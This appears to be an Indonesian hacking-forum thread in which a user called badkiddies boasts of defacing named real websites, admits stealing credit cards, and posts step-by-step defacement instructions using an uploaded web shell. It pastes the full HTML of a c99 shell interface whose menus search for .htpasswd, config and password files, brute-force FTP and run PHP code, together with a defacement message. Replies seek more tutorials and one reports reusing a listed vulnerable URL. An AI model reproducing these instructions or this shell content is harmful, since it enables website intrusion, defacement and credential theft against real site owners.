kali ini badkiddies bukan mo kasih tahu teknik carding, tapi badkiddies mo nunjukin sedikit karya defacenya badkiddies, situs denmark yg badkiddies deface sampe skrg blm diperbaikin ama adminnya. situsnya
====[[BadKiddieS Was Here]]===== (http://www.nordicwalking-bocholt.de/index2.php)

badkiddies deface'nya pake PHP Injection

hikzz...hikzz...
badkiddies tunggu komentar dari tmn2 forum...


"Mohon Maaf Lahir dan Bathin"
- Mohon Maaf kepada semua Admin webshop, karena badkiddies sering mencuri Credit Card dari situs kalian
- Mohon Maaf kepada semua Admin yg situsnya ter-deface, makanya di patch donkz :D

kali ini badkiddies bukan mo kasih tahu teknik carding, tapi badkiddies mo nunjukin sedikit karya defacenya badkiddies, situs denmark yg badkiddies deface sampe skrg blm diperbaikin ama adminnya. situsnya
====[[BadKiddieS Was Here]]===== (http://www.nordicwalking-bocholt.de/index2.php)

badkiddies deface'nya pake PHP Injection

hikzz...hikzz...
badkiddies tunggu komentar dari tmn2 forum...


"Mohon Maaf Lahir dan Bathin"
- Mohon Maaf kepada semua Admin webshop, karena badkiddies sering mencuri Credit Card dari situs kalian
- Mohon Maaf kepada semua Admin yg situsnya ter-deface, makanya di patch donkz :D
wuigh........ ente pasti ahli PHP yaQ? PHP Injection elo buat sendiri? atau niru tehnik orang kayak si th.............r

buatan sendiri donkz... oh iya barusan badkiddies dapet lagi nich
http://www.phdcourse.net:8080/index.php?mode=login

Maaf yh om Admin... situsnya ke deface lagi ma badkiddies

Oi... Tunjukin Donk Step2x Nya PHP Injection , Buat Web Yg Berbasis PHP Khan /no1 Klo SQL Sih Wa Tau /heh

hack situs pln aja :P
coba buka PLN (http://www.pln.co.id/) pasti bs kan tp coba buka http://pln.co.id/
i see Vulnerability here ;;)

hack situs pln aja
coba buka PLN pasti bs kan tp coba buka http://pln.co.id/
i see Vulnerability here
Gw Bosen Ma PLN , Apalage Yg Web Nya Yg Tanggerang /swt
Mending Ajarin Gw PHP Injection /heh Badkiddes Lu Beneran Lu Sendere Yg Deface , Apa Suruh Org Laen /? Klo Lu Sendere Yg Deface , Taro Donk Disene Tutorialnya /heh Biar Bisa Berguna Bagi IF /no1

ajarin dunk cara deface :P

hmm ajarin dunk.. /gg

Kek Nya Doi Gak Mo Ngajarin Dech /swt Mungkin Dia Nyuruh Orang Kali , Temen Nya /heh Buat Nge Deface Suatu Web , Tapi Make Nama Badkidies /heh Istilahnya Tolongin Deface , Gitu Lah /swt

first of all... Badkiddies mo ngucapin makasih bgt atas segala cacian dan hinaan dari mas D-hacker (yg ngaku hacker nich... ;) ) gak ada untungnya badkiddies nitip nm untuk melakukan "defacing". badkiddies bukan mencari ketenaran tapi kebanggan yg amat sangat badkiddies rasakan ketika badkiddies bs masuk ke sistem website orang... badkiddies selama ini tdk menjawab pertanyaan karena badkiddies lagi sibuk.. Mbah badkiddies kemaren meninggal dunia di hari lebaran ke 2 (25 OKT) :( badkiddies sibuk melakukan doa bersama, yh kl di umat islam.. kayak pengajian... jadi maaf baru skrg badkiddies sempat blz.. ok.. dlm melakukan deface kita harus tahu bugs yg akan kita gunakan celahnya... disini badkiddies pake korban http://sugarplumb.com <=== dah badkiddies deface dlan, tp gpp bwt pembelajaran...
1. korban di dapat dari googe hacking, untuk mengetahui bugs terbaru tmn2 harus sering2 lht website www.milw0rm.com atau www.securityfocus.org
2. siapkan "shell" atau PHP Injection
3. siapkan file HTML kalian.
4. buka browser kalian
ketikan : http://sugarplumb.com/shell.php
5. klik "==> Haxplorer <== "
6 cari "index.php" kenapa harus "index" bad... index di gunakan untuk membuat halaman pertama dari suatu website
7. klik "edit' trus buka file html yg dah kalian siapkan.. lalu buka dgn notepad
8. copy-paste semua codenya..
9. klik "save"

skrg lht http://sugarplumb.com
dah ke defaced khn..???
wait badkiddies... kl indexnya gak bs di edit gmn....????
jwbnya : deface aj halaman lainnya contohnya yg kmrn badkiddies kasih
http://www.phdcourse.net:8080/index.php?mode=login <==== dah diperbaikin adminnya kl gak salah :D
disitu badkiddies deface total halaman loginnya /gg

tapi badkiddies kl aq blm pny php injection, bikinnya gmn ??? :-/
easy bro... nich badkiddies kasih <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta http-equiv="Content-Language" content="en-us">
<title>fanlistings.czweb.org Got Fucked [ th3sn0wbr4in ]</title>
<style>
TD {
FONT-SIZE: 8pt;
COLOR: #ebebeb;
FONT-FAMILY: Century Schoolbook L;
}
BODY {
scrollbar-face-color: #a0a0a0;
scrollbar-shadow-color: #101010;
scrollbar-highlight-color: #101010;
scrollbar-3dlight-color: #101010;
scrollbar-darkshadow-color: #101010;
scrollbar-track-color: #101010;
scrollbar-arrow-color: #101010;
font-family: Century Schoolbook L;
}
TD.header {
FONT-WEIGHT: normal;
FONT-SIZE: 10pt;
BACKGROUND: #7d7474;
COLOR: white;
FONT-FAMILY: Century Schoolbook L;
}
A {
FONT-WEIGHT: normal;
COLOR: #dadada;
FONT-FAMILY: verdana;
TEXT-DECORATION: none;
}
A:unknown {
FONT-WEIGHT: bold;
COLOR: #ffffff;
FONT-FAMILY: Century Schoolbook L;
TEXT-DECORATION: none;
}
A.Links {
COLOR: #ffffff;
font-family:Century Schoolbook L
TEXT-DECORATION: none;
}
A.Links:unknown {
FONT-WEIGHT: bold;
COLOR: #ffffff;
TEXT-DECORATION: none;
}
A:hover {
COLOR: #ffffff;
TEXT-DECORATION: underline;
}
.skin0{
position:absolute;
width:200px;
border:2px solid black;
background-color:menu;
font-family:Century Schoolbook L;
line-height:20px;
cursor:default;
visibility:hidden;
}
.skin1{
cursor: default;
font: menutext;
position: absolute;
width: 145px;
background-color: menu;
border: 1 solid buttonface;
visibility:hidden;
border: 2 outset buttonhighlight;
font-family:Century Schoolbook L,Geneva, Arial;
font-size: 10px;
color: black;
}.
menuitems{
padding-left:15px;
padding-right:10px;
}
input{
background-color: #000000;
font-size: 10pt;
color: #FFFFFF;
font-family: Century Schoolbook L;
border: 1 solid #666666;
}
textarea{
background-color: #800000;
font-size: 8pt;
color: #FFFFFF;
font-family: Century Schoolbook L;
border: 1 solid #666666;
}
button{
background-color: #000000;
font-size: 8pt;
color: #FFFFFF;
font-family:Century Schoolbook L;
border: 1 solid #666666;
}
select{
background-color: #000000;
font-size: 10pt;
color: #FFFFFF;
font-family:Century Schoolbook L;
border: 1 solid #666666;
}
option {
background-color: #000000;
font-size: 10pt;
color: #FFFFFF;
font-family:Century Schoolbook L;
border: 1 solid #666666;
}
iframe {
background-color: #800000;
font-size: 8pt;
color: #FFFFFF;
font-family: Century Schoolbook L;
border: 1 solid #666666;
}
p {
MARGIN-TOP: 0px;
MARGIN-BOTTOM: 0px;
LINE-HEIGHT: 150%
}
blockquote{
font-size: 8pt;
font-family: Courier, Fixed, Arial;
border : 8px solid #A9A9A9;
padding: 1em;
margin-top: 1em;
margin-bottom: 5em;
margin-right: 3em;
margin-left: 4em;
background-color: #B7B2B0;
}
body,td,th {
font-family: verdana;
color: #d9d9d9;
font-size: 11px;
}
body {
background-color: #000000;
}
</style>
</head>
<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
<center>
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0" >
<tr>
<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2">
<pre><strong><font color="#00ffff"><center>
================================================== ===========================================</font>
__ __ ______ ____ _____ __ __ __ _______ __ __ ,,
| | | | | ___ \/ __ \ _____ / _ \| | | | | | '__ \| || |__ _____
[- -] | |__ \/ _| | ||_| / __ | | | | | | | |____ | | |__|| || | |/ __ |
| | __| __ \ |__ |\____\| || | | | | |___| | _ \| | \___ | | || |
| || | || | /\__| || || || || | |_| | || || | |_) | | | | | || |
\.__./|__||__||______/\____/|__||__|\_____/ \_______/|__|\___/|__| |__|__|__||__|
Production</font><font color="#00ffff">
================================================== ============================================</font></center></strong></pre>
</font><br>c99 shell versi th3sn0wbr4in (xixixixixixixi)
<br></center></th></tr><tr><td><p align="left">
<b>Software Server : Apache/2.0.59 (Unix). <a href="?act=phpinfo" target="_blank"><b><u>PHP/4.3.4</u></b></a></b>&nbsp;</p>
<p align="left"><b>System :&nbsp;Linux mars.webzdarma.cz 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686</b>&nbsp;</p>
<p align="left"><b>
</b>&nbsp;</p>
<p align="left"><b>Safe-mode : <font color=#ff0000>ON (secure)</font></b></p>
<p align="left">
<a href="?act=ls&d=%2F&sort=0a"><b>/</b></a><a href="?act=ls&d=%2F3w%2F&sort=0a"><b>3w/</b></a><a href="?act=ls&d=%2F3w%2Fczweb.org%2F&sort=0a"><b>czweb.org/</b></a><a href="?act=ls&d=%2F3w%2Fczweb.org%2Ff%2F&sort=0a"><b>f/</b></a><a href="?act=ls&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F&sort=0a"><b>fanlistings/</b></a>&nbsp;&nbsp;&nbsp;<b><font color=#00ff00>drwxrwxr-x</font></b><br><b>Free 504.48 GB of 1389.84 GB (36.3%)</b><br><a href="?"><img src="?act=img&img=home" alt="Home" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" onclick="history.back(1)"><img src="?act=img&img=back" alt="Mundur" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" onclick="history.go(1)"><img src="?act=img&img=forward" alt="Maju" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=ls&d=%2F3w%2Fczweb.org%2Ff&sort=0a"><img src="?act=img&img=up" alt="Parent Directory" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href=""><img src="?act=img&img=refresh" alt="Refresh" height="20" width="17" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=search&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><img src="?act=img&img=search" alt="Search" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=fsbuff&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><img src="?act=img&img=buffer" alt="Buffer" height="20" width="20" border="0"></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=encoder&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Encoder</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=tools&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Tools</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=processes&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Proses</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=ftpquickbrute&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>FTP brute</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=security&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Sec.</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=sql&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>SQL</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="?act=eval&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>PHP-code</b></a>&nbsp;&nbsp;&nbsp;&nbsp;</p></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src="?act=img&img=ext_php" border="0">&nbsp;index.php (4.65 KB) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=#00ff00>-rw-r--r--</font></b><br>Select action/file-type:<br> <a href="?act=f&f=index.php&ft=info&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_diz" border="0"></b></a> (<a href="?act=f&f=index.php&ft=info&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=html&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_html" border="0"></b></a> (<a href="?act=f&f=index.php&ft=html&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=txt&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_txt" border="0"></b></a> (<a href="?act=f&f=index.php&ft=txt&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=code&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><font color=#00ff00>Code</font></a> (<a href="?act=f&f=index.php&ft=code&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=phpsess&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Session</b></a> (<a href="?act=f&f=index.php&ft=phpsess&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=exe&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_exe" border="0"></b></a> (<a href="?act=f&f=index.php&ft=exe&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=sdb&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>SDB</b></a> (<a href="?act=f&f=index.php&ft=sdb&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=img&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_gif" border="0"></b></a> (<a href="?act=f&f=index.php&ft=img&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=ini&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_ini" border="0"></b></a> (<a href="?act=f&f=index.php&ft=ini&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=download&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=download" border="0"></b></a> (<a href="?act=f&f=index.php&ft=download&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=notepad&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><img src="?act=img&img=ext_rtf" border="0"></b></a> (<a href="?act=f&f=index.php&ft=notepad&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) | <a href="?act=f&f=index.php&ft=edit&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b><u><img src="?act=img&img=change" border="0"></u></b></a> (<a href="?act=f&f=index.php&ft=edit&white=1&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" target="_blank">+</a>) |<hr size="1" noshade><b>Tersimpan!</b><form action="?act=f&f=index.php&ft=edit&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F" method=POST><input type=submit name=submit value="Save">&nbsp;<input type="reset" value="Reset">&nbsp;<input type="button" onclick="location.href='?act=ls&d=/3w/czweb.org/f/fanlistings';" value="Back"><br><textarea name="edit_text" cols="122" rows="10">&lt;body bgcolor=black&gt;&lt;b&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;font face=verdana size=4pt color=red&gt;HACKED BY BadKiddies..&lt;br&gt;Ur Site Has been Defaced by BadKiddies..&lt;br&gt;&lt;br&gt;Fuck You Admin&lt;Br&gt;Nothing is Secure..&lt;br&gt;&lt;Br&gt;&lt;br&gt;&lt;br&gt;special thanks to th3sn0wbr4in&lt;br&gt;&lt;br&gt;&lt;br&gt;badkiddies@gmail.com&lt;br&gt;&lt;/b&gt;</textarea></form></td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="?act=cmd&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b>Menu Perintah</b></a> ::</b></p></td></tr>
<tr><td width="50%" height="1" valign="top"><center><b>:: Jalankan Perintah :: </b><form action="?"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="cmd" size="50" value="" style="background-color:#000000"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value=":: Jalankan ::" style="background-color:#000000"></form></td><td width="50%" height="1" valign="top"><center><b>:: Perintah Instan :: </b><form action="?act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><select name="cmd" style="background-color:#000000"><option value="ls -lia" >Daftar Isi</option><option value="find / -name order.log -type f" >Cari order.log</option><option value="find / -type f -name *.mdb" >Cari *.mdb</option><option value="find / -type d -perm -777 -ls" >Cari semua Folder bermode 777</option><option value="find . -type d -perm -777 -ls" >Cari semua Folder bermode 777 di Directory skrg</option><option value="find / -perm -2 -ls" >Cari semua Folder &amp; File yang bisa ditulis</option><option value="find . -perm -2 -ls" >Cari semua Folder &amp; File yang bisa ditulis di Directory skrg</option><option value="find / -type f -name config.inc.php" >Cari File config.inc.php </option><option value="find / -type f -name &quot;config*&quot;" >Cari File config* </option><option value="find / -type f -name service.pwd" >Cari File service.pwd files</option><option value="find / -type f -name .htpasswd" >Cari semua File .htpasswd</option><option value="find . -type f -name .htpasswd" >Cari semua File .htpasswd di Directory skrg</option><option value="netstat -an | grep -i listen" >Lihat daftar Port yang terbuka</option></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value=":: Jalankan ::" style="background-color:#000000"></form></td></tr></TABLE>
<br>
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr>
<td width="50%" height="1" valign="top"><center><b>:: <a href="?act=search&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b> Cari </b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="search_name" size="29" value="Ketik yang ingin Lo cari" style="background-color:#000000">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value=":: Cari ::" style="background-color:#000000"></form></center></p></td>
<td width="50%" height="1" valign="top"><center><b>:: <a href="?act=upload&d=%2F3w%2Fczweb.org%2Ff%2Ffanlistings%2F"><b> Upload </b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile" style="background-color:#000000"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value=":: Upload ::" style="background-color:#000000"><br><font color=#00ff00>[ OK ]</font></form></center></td>
</tr>
</table>
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Bikin Direktori Baru ::</b><form action="?"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="mkdir" size="50" value="/3w/czweb.org/f/fanlistings/" style="background-color:#000000">&nbsp;<input type=submit value=":: Bikin ::" style="background-color:#000000"><br><font color=#00ff00>[ OK ]</font></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Bikin File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="mkfile" size="50" value="/3w/czweb.org/f/fanlistings/" style="background-color:#000000"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value=":: Bikin ::" style="background-color:#000000"><br><font color=#00ff00>[ OK ]</font></form></center></td></tr></table>
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Pindah Directory ::</b><form action="?"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="/3w/czweb.org/f/fanlistings/" style="background-color:#000000">&nbsp;<input type=submit value=":: Pindah ::" style="background-color:#000000"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Lihat File ::</b><form action="?"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="/3w/czweb.org/f/fanlistings/"><input type="text" name="f" size="50" value="/3w/czweb.org/f/fanlistings/" style="background-color:#000000">&nbsp;<input type=submit value=":: Lihat ::" style="background-color:#000000"></form></center></td></tr></table>
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b><a href="?act=about"><u><center>Brought to you by</u></a><a href="http://th3sn0wbr4in.blogspot.com"> th3sn0wbr4in</center></a></b></p></td></tr></table>
</body></html>


..::Note::..
kl kalian mo pake php injection, at least kalian harus tahu perintah linux

tuch codenya... simpan dgn nama terserah kalian.. save as apa bad...
terserah juga.. .gif bs.. .jpeg bs juga.. .txt juga bisa... .cmd juga bisa

pokoknya terserah kalian dan simpan di domain kalian... kl gak pny bad ??? yh simpen di geocities aj juga gpp..

happy deface...

cacian, makian, badkiddies tunggu di forum ini

gak ada untungnya badkiddies nitip nm untuk melakukan "defacing". badkiddies bukan mencari ketenaran tapi kebanggan yg amat sangat badkiddies rasakan ketika badkiddies bs masuk ke sistem website orang...
Ngapain Deface Klo Gak Ada Untungnya /? Mang DefaaceBikin Bs Jd Terkenal , Mang Sich Jalur Gw Bkn Di Hacking, But Masuk Ke Sistem Org Lewat Deface /? Wkkkk...B'Canda Ya /? Trus , Kek Nya Gw Pernah Liat Article Nya, Tapi Di Mana Yach /? N Once Again , Defacing Itu Menurut Gw Gak Jaman , Klo Gw Sih Maennya Back Door/!

Oh Iya , BadkiddiesNih Thread Gw Bantuin Yach /heh Biar Pd Ngerti Semua /!
korban di dapat dari googe hacking, untuk mengetahui bugs terbaru tmn2 harus sering2 lht website milw0rm.com (http://milw0rm.com) atau SecurityFocus (http://www.securityfocus.org)

1. korban di dapat dari googe hacking, untuk mengetahui bugs terbaru tmn2 harus sering2 lht website milw0rm.com (http://milw0rm.com) atau SecurityFocus (http://www.securityfocus.org)
Google Hacking (http://www.indoforum.org/guide-tutorial/tips-mengoptimal-kan-google-buat-hacking-8027/) Ada Di Bagian Tutorial


Once Again, TBC (Turut Berduka Cita /!)

ooooo....ternyata deface gitu toh caranya....baru tau....jadi inget jaman gue dulu r00ting Sun Solaris'nya matahariclubcard.com
caranya beda sekali jaman dulu ama jaman sekarang ya

Ngapain Deface Klo Gak Ada Untungnya Mang DefaaceBikin Bs Jd Terkenal
Wkkk... Bs Jd Tenar /? Klo Th0r Ngedenger Ini Bs Keseleg Nich /heh Eh... Klo Lu Hacker Mustinya Tau Donk , Deface Ama Hack Itu Apa /? Deface Itu Langkah Awal Sesuda Hacking /! Misalnya : Lu Abis Ambil Data2x Penting N Secure Di Suatu Web , Abis Lu Ambil Baru Lu Deface /no1 Klo Di Deface Nggak Di Hacking Mah , Ngapain /? Kurang Kerjaan /!

Lagian Trick Lu Aneh /? Lu Nyolong Dr Mn Trick Ini /?
2. siapkan "shell" atau PHP Injection
3. siapkan file HTML kalian.
4. buka browser kalian
ketikan : /shell.php (http://sugarplumb.com/shell.php)
5. klik "==> Haxplorer <== "
6 cari "index.php" kenapa harus "index" bad... index di gunakan untuk membuat halaman pertama dari suatu website
7. klik "edit' trus buka file html yg dah kalian siapkan.. lalu buka dgn notepad
8. copy-paste semua codenya..
9. klik "save"
Gw Binggung Nich Disitu Khan Ada Siapkan Shell / PHP Injection N Siapkan Html Bautan Qta Abis Itu Cari Target /omg N Serang Make HTML Buatan QTa /heh La.. Trus Mana Langkah Nge Inject PHP Nya /? Mana Langkah Buat Masukin Kode2x PHP Nya /? Disitu Cm Ada Perintah "Siapka PHP Injection N Siapkan HTML" Abis Itu Ke Web Sasaran , Trus "/shell.php , terus Haxplorer , terus HTML Nya Gunain , Terus Save /!

Kmaren gw PM Si D-Cracker , Liat Tuh Siggy nya /! Dia Nge Deface Make PHP injection /! Kt Dia , Dia Nggak butuh Kode2x Tsb , Dia Lgs Melkaukan Aza /! Misalnya Web Nya Ini : xxx/shell.php
Nah Dia Lgs Aza tulis di address bar /shell.php , joq Bisa ya /? Pd Hal Khan Harus Nya Make Kode2x PHP Injection Dolo /?

Ehmm... Cara Biar Dapet WEB Yg Bisa Make PHP Injection Biar Cpt Gimana /? Make Google Hack Khan /? Ajarin Donk GRP++ Dech /no1

Oh Iye.. TS , Credit's Nya : Jgn Lupa Y /heh

cara nyari web yang bisa di kasi /shell.php gimana?

sori...
http://www.phdcourse.net:8080/index.php?mode=login nya udah gw tes..
bisa..
tapi isinya gw ganti^^

Yah Elah , Pd Males Semua Ya /swt Cari Ndiri Donk /! Kasian Tuh BadKiddies /sob

/wah Pada seneng nge-Deface yah /wah

first of all... Badkiddies mo ngucapin makasih bgt atas segala cacian dan hinaan dari mas D-hacker (yg ngaku hacker nich... ;) ) gak ada untungnya badkiddies nitip nm untuk melakukan "defacing". badkiddies bukan mencari ketenaran tapi kebanggan yg amat sangat badkiddies rasakan ketika badkiddies bs masuk ke sistem website orang... badkiddies selama ini tdk menjawab pertanyaan karena badkiddies lagi sibuk.. Mbah badkiddies kemaren meninggal dunia di hari lebaran ke 2 (25 OKT) :( badkiddies sibuk melakukan doa bersama, yh kl di umat islam.. kayak pengajian... jadi maaf baru skrg badkiddies sempat blz.. ok.. dlm melakukan deface kita harus tahu bugs yg akan kita gunakan celahnya... disini badkiddies pake korban Index of / (http://sugarplumb.com) <=== dah badkiddies deface dlan, tp gpp bwt pembelajaran...
1. korban di dapat dari googe hacking, untuk mengetahui bugs terbaru tmn2 harus sering2 lht website milw0rm.com (http://www.milw0rm.com) atau SecurityFocus (http://www.securityfocus.org)
2. siapkan "shell" atau PHP Injection
3. siapkan file HTML kalian.
4. buka browser kalian
ketikan : /shell.php (http://sugarplumb.com/shell.php)
5. klik "==> Haxplorer <== "
6 cari "index.php" kenapa harus "index" bad... index di gunakan untuk membuat halaman pertama dari suatu website
7. klik "edit' trus buka file html yg dah kalian siapkan.. lalu buka dgn notepad
8. copy-paste semua codenya..
9. klik "save"

skrg lht Index of / (http://sugarplumb.com)
dah ke defaced khn..???
wait badkiddies... kl indexnya gak bs di edit gmn....????
jwbnya : deface aj halaman lainnya contohnya yg kmrn badkiddies kasih
http://www.phdcourse.net:8080/index.php?mode=login <==== dah diperbaikin adminnya kl gak salah :D
disitu badkiddies deface total halaman loginnya /gg

tapi badkiddies kl aq blm pny php injection, bikinnya gmn ??? :-/
easy bro... nich badkiddies kasih <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta http-equiv="Content-Language" content="en-us">
<title>fanlistings.czweb.org Got Fucked [ th3sn0wbr4in ]</title>
<style>
TD {
FONT-SIZE: 8pt;
COLOR: #ebebeb;
FONT-FAMILY: Century Schoolbook L;
}
BODY {
scrollbar-face-color: #a0a0a0;
scrollbar-shadow-color: #101010;
scrollbar-highlight-color: #101010;
scrollbar-3dlight-color: #101010;
scrollbar-darkshadow-color: #101010;
scrollbar-track-color: #101010;
scrollbar-arrow-color: #101010;
font-family: Century Schoolbook L;
}
TD.header {
FONT-WEIGHT: normal;
FONT-SIZE: 10pt;
BACKGROUND: #7d7474;
COLOR: white;
FONT-FAMILY: Century Schoolbook L;
}
A {
FONT-WEIGHT: normal;
COLOR: #dadada;
FONT-FAMILY: verdana;
TEXT-DECORATION: none;
}
A:unknown {
FONT-WEIGHT: bold;
COLOR: #ffffff;
FONT-FAMILY: Century Schoolbook L;
TEXT-DECORATION: none;
}
A.Links {
COLOR: #ffffff;
font-family:Century Schoolbook L
TEXT-DECORATION: none;
}
A.Links:unknown {
FONT-WEIGHT: bold;
COLOR: #ffffff;
TEXT-DECORATION: none;
}
A:hover {
COLOR: #ffffff;
TEXT-DECORATION: underline;
}
.skin0{
position:absolute;
width:200px;
border:2px solid black;
background-color:menu;
font-family:Century Schoolbook L;
line-height:20px;
cursor:default;
visibility:hidden;
}
.skin1{
cursor: default;
font: menutext;
position: absolute;
width: 145px;
background-color: menu;
border: 1 solid buttonface;
visibility:hidden;
border: 2 outset buttonhighlight;
font-family:Century Schoolbook L,Geneva, Arial;
font-size: 10px;
color: black;
}.
menuitems{
padding-left:15px;
padding-right:10px;
}
input{
background-color: #000000;
font-size: 10pt;
color: #FFFFFF;
font-family: Century Schoolbook L;
border: 1 solid #666666;
}
textarea{
